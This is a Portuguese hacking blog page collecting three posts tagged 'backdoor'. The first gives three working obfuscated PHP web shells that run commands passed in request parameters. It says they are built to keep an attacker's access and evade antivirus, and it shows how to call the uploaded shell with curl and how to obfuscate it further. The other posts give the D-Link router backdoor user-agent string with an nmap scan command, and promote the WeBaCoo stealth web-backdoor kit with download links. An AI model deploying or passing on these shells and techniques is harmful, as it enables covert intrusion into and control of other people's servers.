Google INURL - Brasil: backdoor

Mostrando postagens com marcador backdoor. Mostrar todas as postagens

sábado, 21 de março de 2015

INURL - BRASIL / Simple Shell Backdoor

Maneiras simples de acesso escondido.

No desenvolvimento de software, a ofuscação é o ato deliberado de criação de código ofuscado, ou seja, de origem ou código de máquina que é difícil para o ser humano de entender. Como ofuscação em linguagem natural, pode usar expressões desnecessariamente rotunda para compor declarações. Os programadores podem deliberadamente ofuscar código para esconder a sua finalidade (segurança pela obscuridade) ou a sua lógica, a fim de evitar a violação, impedir a engenharia reversa, ou como um quebra-cabeça ou desafio de lazer para alguém que lê o código fonte. Programas conhecidos como obfuscators transformar código legível em código ofuscado usando várias técnicas.

Script php shell de exploração utilizando function nativos do PHP e tentando melhorar a dinâmica e forma de uso do script.
Para executar comandos em um servidor em sua SHELL podemos usar as seguintes functions nativas:

shell_exec - Executa um comando via shell e retorna a saída inteira como uma string.
system - Executa um programa externo e mostra a saída.
exec - Executa um programa externo.
passthru - Executa um programa externo e mostra a saída crúa.

Com o grande numero de scanners/aplicações de segurança que tem o objetivo procurar arquivos maliciosas em seus servidores, muitos estão optando por usar um script simples para escapar dos famigerados AV's ("nada é 100% juntando isso com ofuscação de código você tem mais invisibilidade ").
Tais scripts tem o objetivo de manter o acesso do atacante, logo abaixo temos 3 modelos de script php que nem um mostra nome de functions nativas php, script pequeno e objetivo.

[+] MODEL-01 CODE >>
<?php $__=@base64_decode("c3lzdGVt");echo@$__(isset($_REQUEST[0])?$_REQUEST[0]:NULL);
?>

[+] MODEL-02 CODE >>
<?php
echo(`{$_REQUEST[0]}`);
?>

[+] MODEL-03 CODE >>
<?php $_=$_REQUEST[0];@$__=@create_function('$_',base64_decode("ZWNobyhzaGVsbF9leGVjKCRfKSk7"));@$__($_);
?>
SOURCE SCRIPTS: http://pastebin.com/D07wPKmA

Usando o script depois de upado:
EX: http://localhost/of.php?0={COMMAND_ENCOD_URL}

curl "http://localhost/of.php?0=uname%20-a%20%26%26%20ls%20-la"

Exemplo de RESULTADO:

$Usando o script depois de upado: EX: http://localhost/of.php?0={COMMAND_ENCOD_URL} curl "http://localhost/of.php?0=uname%20-a%20%26%26%20ls%20-la" Exemplo de RESULTADO:$

OBS: Os 3 script exemplos foram anexados a um arquivo par gerar tal output.

OFUSCANDO SEU CÓDIGO:
No desenvolvimento de software, a ofuscação é o ato deliberado de criação de código ofuscado, ou seja, de origem ou código de máquina que é difícil para o ser humano de entender. Como ofuscação em linguagem natural, pode usar expressões desnecessariamente rotunda para compor declarações.

Os programadores podem deliberadamente ofuscar código para esconder a sua finalidade (segurança pela obscuridade) ou a sua lógica, a fim de evitar a violação, impedir a engenharia reversa, ou como um quebra-cabeça ou desafio de lazer para alguém que lê o código fonte.

Programas conhecidos como obfuscators transformar código legível em código ofuscado usando várias técnicas.
Serviço online FOPO:

FOPO creates equivalent PHP obfuscated code which requires no special server runtime for execution. It's not one-way encryption but it will keep curious eyes away from your code. Submitted code gets deleted immediately after obfuscation and is not stored in any way. If you have any comments or suggestions feel free to reach me at fopo@dynsur.com. Note: In case you've lost the original source code and you are the proven owner of it, a one-way encrypted copy is saved within the obfuscated output and I'll kindly assist you in recovering it.

Obfuscator: http://fopo.com.ar/

# REF:
# http://php.net/manual/en/language.operators.execution.php#language.operators.execution
# https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell
# http://www.businessinfo.co.uk/labs/talk/Nonalpha.pdf
# http://php.net/manual/pt_BR/book.exec.php
# http://curl.haxx.se/docs/httpscripting.html
# http://pastebin.com/D07wPKmA
# http://fopo.com.ar/
# http://en.wikipedia.org/wiki/Obfuscation_%28software%29

segunda-feira, 2 de dezembro de 2013

Backdoor encontrado em roteadores D-Link

Em outubro, um pesquisador de segurança Craig Heffner "descobriu uma vulnerabilidade backdoor (CVE-2013-6027) em determinados roteadores D-Link que permitem hackers alterem a configuração do roteador sem um nome de usuário ou senha.

A D-Link lançou nova versão do firmware para vários modelos de roteadores vulneráveis, que corrige o backdoor não autorizado acesso de administrador.

Heffner descobriu que a interface web para alguns roteadores D-Link pode ser acessado se o user agent string estive definido como xmlset_roodkcableoj28840ybtide

D-Link estava trabalhando com Heffner e outros pesquisadores de segurança, para descobrir mais sobre o backdoor e agora a empresa lançou as atualizações para os seguintes modelos:

DIR-100
DIR-120
DI-524
DI-524UP
DI-604UP
DI-604+
DI-624S
TM-G5240

Roteadores da marca Planex tem o mesmo firmware:

BRL-04UR
BRL-04CW

D-Link estava trabalhando com Heffner e outros pesquisadores de segurança, para descobrir mais sobre o backdoor e agora a empresa lançou as atualizações para os seguintes modelos:

A empresa aconselha os usuários a não ativar o recurso de gerenciamento remoto, uma vez que irá permitir que usuários mal-intencionados acessem seu roteador, E também alertou para ignorar e-mails não solicitados: Se você receber e-mails não solicitados que se relaciona com as vulnerabilidades de segurança e pedir-lhe para fazer uma ação, por favor, ignore-o. Quando você clica em links de tais e-mails, que poderia permitir que pessoas não autorizadas a acessar o seu router. Nem D-Link, nem os seus parceiros e revendedores irá enviar mensagens não solicitadas, onde você está convidado a clicar ou instalar alguma coisa.

NMAP tambem lançou um script no mês passado para fazer a varredura e encontrar os roteadores vulneráveis.
Script NMAP: http://seclists.org/nmap-dev/2013/q4/att-33/http-dlink-backdoor.nse

Usando:

nmap -sV --script http-dlink-backdoor SEU_ALVO

Tuto nmap:http://www.cyberciti.biz/networking/nmap-command-examples-tutorials/

Outro script com a mesma logica porem feito em PYTHON:
http://pastebin.com/raw.php?i=vbiG42VD

Fonte:http://thehackernews.com/2013/12/d-link-releases-router-firmware-updates.html

sexta-feira, 23 de novembro de 2012

WeBaCoo (Web Backdoor Cookie)

WeBaCoo (Web Backdoor Cookie) é um backdoor script web-kit, com o objetivo de fornecer uma discrição conexão terminal como sobre HTTP entre cliente e servidor web. É uma ferramenta de exploração post para manter o acesso a um servidor web comprometido.

WeBaCoo foi projetado para operar sob o radar de moderno up-to-datado AV, NIDS, IPS, firewalls de rede e firewalls de aplicativos, provando um mecanismo de cautela para executar comandos no servidor comprometido. A comunicação é feita usando ofuscado campos de cabeçalho HTTP do biscoito de pedidos do cliente válido e respostas HTTP servidor web parente.

O script kit tem dois modos de operação principais: Geração e "Terminal". Usando o modo de geração, o usuário pode criar o código backdoor contendo as cargas PHP. Por outro lado, no modo "terminal" remoto o cliente pode ligar para o servidor comprometido onde o código PHP backdoor foi injetado. A fim de estabelecer o controle remoto "pseudo"-Shell, o usuário deve fornecer o caminho do servidor URL contendo o código injetado.

WeBaCoo é escrito em Perl sob licença GPLv3 e está hospedado no Github. Você pode baixar WeBaCoo por clonagem do repositório:

Baixar:

git clone git://github.com/anestisb/WeBaCoo.git

ou download direto 

https://github.com/anestisb/WeBaCoo/zipball/master
http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

Páginas

Parceiro: Camisetas Hacker